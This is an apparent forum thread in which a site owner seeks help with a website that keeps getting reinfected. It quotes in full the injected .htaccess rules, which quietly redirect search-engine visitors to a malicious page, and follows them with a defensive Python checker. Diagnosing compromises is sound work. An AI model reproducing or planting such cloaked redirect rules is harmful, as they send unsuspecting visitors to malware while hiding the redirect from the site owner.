
Website infected with virus - keeps coming back

Medium Priority
1,117 Views
Last Modified: 2013-11-22
Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:

www.philcampbellmusic.co.uk

(WARNING: virus present at time of writing on the above website, which will be brought down in the next few hours and reset. Make sure you have anti-virus software on your PC before clicking the link above.)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administration for the CMS that allowed us to edit the content and of course tried changing various passwords.

The website is hosted by Fasthosts (Linux package, MySQL db). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks

Top Expert 2009
Commented:
Hi,
If the website is hosted on Linux, then I would not say for sure that it has been affected by a virus.

It could be that someone uploaded a script to the server via your CMS, or your server has been compromised.

Can you explain what makes you think it has been affected by a virus?

Did anyone tell you?

Also, is this shared hosting or VPS hosting?


Author

Commented:
If you visit the website running anti-virus software and Internet Explorer (say, try it with AVG) then you will see what occurs. In fact I have attached a screenshot.

Also, if you google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from recurring?


ExampleCapture.JPG
Top Expert 2009
Commented:
OK, from my PC I am getting Troj/JSRedir-D for the script call .js.

If you look at the picture you will see
it's taking /admin/images/check.js as a virus.

It's treating the JS script as a virus.

Like one of my websites: I had a simple JavaScript, and those anti-virus products would not allow the page to be viewed because of the JavaScript.


Cleaning the virus on the PC would not make any difference, and also there is no virus on the server; it's the script you need to check. There is something in the script that is not allowed by the anti-virus.

virusscript.GIF

Author

Commented:
It is a script virus, but that's the problem. It actually tries to compromise visitors' PCs. Fasthosts even closed us down for not sorting it out for a period of time.
Also, the problem at present does not occur in Firefox, only IE, and the Flash does not play properly.

Top Expert 2009
Commented:
It's the CMS you are using; I would say the bugs are in that CMS.

Do you have a check.js file at /admin/images/ehi/check.js?

Commented:
Hi,

Can you rename both files and upload them here, please?



A Symantec Certified Specialist @ your service

Author

Commented:
I will upload them ASAP. They are always the files that get changed, and they are full of someone else's code.

Unfortunately the original creators of the website have washed their hands of the website a bit, which is frustrating.

Thanks.

Author

Commented:
I'm struggling to upload the two infected files right now. But please find the contents of the .htaccess file (in the code box).
It uses a lot of empty space, so when you first open it it looks like an empty file.

Also, I have now written instructions on how I fix the problem. But it is never long before it comes back. The guide is:

1) Delete the ehi folder in
/htdocs/admin/images/

2) Replace the two files
flashEmbed.js
pageSwitch.js
with non-infected versions.

3) Open for editing and delete all the content in the .htaccess file in the root folder.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever in?




# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
# Only fires when the visitor's referrer is one of these search engines...
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
# ...and the referrer URL carries a search-query parameter...
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
# ...but not a quoted or operator query (%22 or %3A in the query value)...
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
# ...during seconds 00-58 of each minute (i.e. almost always).
RewriteCond %{TIME_SEC} <59
# Every such request is rewritten to the page dropped under the ehi folder,
# so the owner browsing the site directly never sees the redirect.
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

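As an added example (not code from this thread, the CMS or the host), here is a small Python check for the two symptoms the post describes: a referrer-gated rewrite in .htaccess that only visitors arriving from a search engine hit, and the two JavaScript files silently changing after a cleanup. It assumes the site root is readable from where the script runs; the sample .htaccess below is a constructed, shortened copy of the quoted one.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed sample in the shape of the rules quoted above (engine list shortened).
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|key|keywords)\=
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
"""
SEARCH_ENGINES = ("google", "msn", "yahoo", "yandex", "bing")

def find_cloaked_redirects(htaccess_text):
    """Targets of RewriteRules gated on a search-engine referrer: such a rule fires
    only for search-result visitors, so the owner browsing directly never sees it."""
    hits, referrer_gated = [], False
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond") and "HTTP_REFERER" in line and any(
                e in line.lower() for e in SEARCH_ENGINES):
            referrer_gated = True
        elif line.startswith("RewriteRule"):
            parts = line.split()
            if referrer_gated and len(parts) >= 3:
                hits.append(parts[2])
            referrer_gated = False  # a RewriteRule consumes the RewriteConds above it
    return hits

def baseline(site_root, files):
    """SHA-256 of each known-clean file, recorded right after a cleanup."""
    return {f: hashlib.sha256((Path(site_root) / f).read_bytes()).hexdigest()
            for f in files}

def changed_since(site_root, known_good):
    """Files that are missing or whose hash no longer matches the baseline."""
    return sorted(f for f, d in known_good.items()
                  if not (Path(site_root) / f).exists()
                  or hashlib.sha256((Path(site_root) / f).read_bytes()).hexdigest() != d)

def self_check():
    """Constructed run in a temp dir: baseline a clean file, then tamper with it."""
    root = Path(tempfile.mkdtemp())
    (root / "admin").mkdir()
    js = root / "admin" / "pageSwitch.js"
    js.write_text("// clean page switcher\n")
    good = baseline(root, ["admin/pageSwitch.js"])
    before = changed_since(root, good)
    js.write_text("// clean page switcher\n/* injected loader appended here */\n")
    return before, changed_since(root, good)
```

Run `baseline()` on the root .htaccess and the two .js files straight after the three cleanup steps, then `changed_since()` from a cron job; the timestamp of the first change narrows down which log lines to read on the host.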

Author

Commented:
So, any ideas on this? At present the virus is not present, as I cleaned it up again, but I know sooner or later it will rear its head again. It would be nice to close whatever hole is open.

Thanks
Commented:
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service

Author

Commented:
I will check out some of these links, but I would also add: don't forget I'm using a shared host, so I doubt I would be able to make changes to the Apache installation?
Do you think the webhost themselves (Fasthost) play some part in the weak security?
Commented:
Hi,

Yes, you should ask them on how to add/enable mod_security for apache. Otherwise, change the hosting provider. If they can't protect, it's the time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service
Still OK since fixing the last attack, but I'm sure an attack is imminent. I will close this for now, however.

Thanks

Author

Commented:
Note: I thought I had already awarded points for this question, but if this has not happened let me know. I believe I have awarded points and accepted my own summary answer.

Thanks